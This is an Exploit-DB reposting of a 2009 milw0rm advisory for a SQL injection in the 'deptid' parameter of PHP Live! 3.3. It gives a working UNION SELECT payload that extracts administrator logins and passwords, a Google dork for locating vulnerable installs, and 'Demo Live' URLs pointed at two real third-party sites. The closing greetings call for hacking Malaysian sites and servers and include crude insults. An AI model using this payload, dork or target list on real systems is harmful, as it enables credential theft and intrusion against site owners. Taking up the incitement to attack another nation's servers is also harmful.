PHP Live! 3.3 - 'deptid' SQL Injection

EDB-ID:

9578

CVE:

2009-3062

EDB Verified:

Author:

v3n0m

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-09-02

Vulnerable App: 
*************************************************************************
,   .                                       |          |    o     |    
|   |,---.,---.,   .,---.,---.,---.,---.,---|,---.,---.|    .,---.|__/ 
`---'|   ||   ||   |,---||    ,---||    |   ||---'|    |    ||   ||  \ 
  |  `---'`---|`---|`---^`---'`---^`    `---'`---'`    `---'``   '`   `
  `       `---'`---'                                                   
*************************************************************************
[o] PHP Live! 3.3 (deptid) Remote SQL Injection

			--==[ Author ]==--
[+] Author	: v3n0m
[+] Contact	: v3n0m666[at]live[dot]com
[+] Blog	: http://0wnage.wordpress.com/
[+] Group	: YOGYACARDERLINK
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: September, 02-2009 [INDONESIA]
*************************************************************************
			--==[ Details ]==--
[+] Software	: PHP Live! Chat
[+] Version 	: v3.3
[+] Vendor 	: http://www.phplivesupport.com/
[+] Price	: $49.95
[+] Vulnerable	: Remote SQL Injection
[+] Google Dork	: "Powered by PHP Live! v3.3"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
    [xxx] = Valid x number

[-] Demo Live:
[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--


FYI: Think twice before you buy these vulnerable script for $49.95 ?

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks	=> str0ke & milw0rm
RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,LeQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
		=> & para gay yogyagaylink bruakakakakakakak
Others		=> g0par Santiago,Don Tukulesto,mixbrainwasher
		=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks	=> mywisdom [nice 0-day, you're 31337]
		=> yadoy666 [Mari kita ganyang malingsianjink]
		=> Angela Zhang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
  be carefull your culture art & song,island get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 11:20pm in my bedroom, preparing office goes on...!!

# milw0rm.com [2009-09-02]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services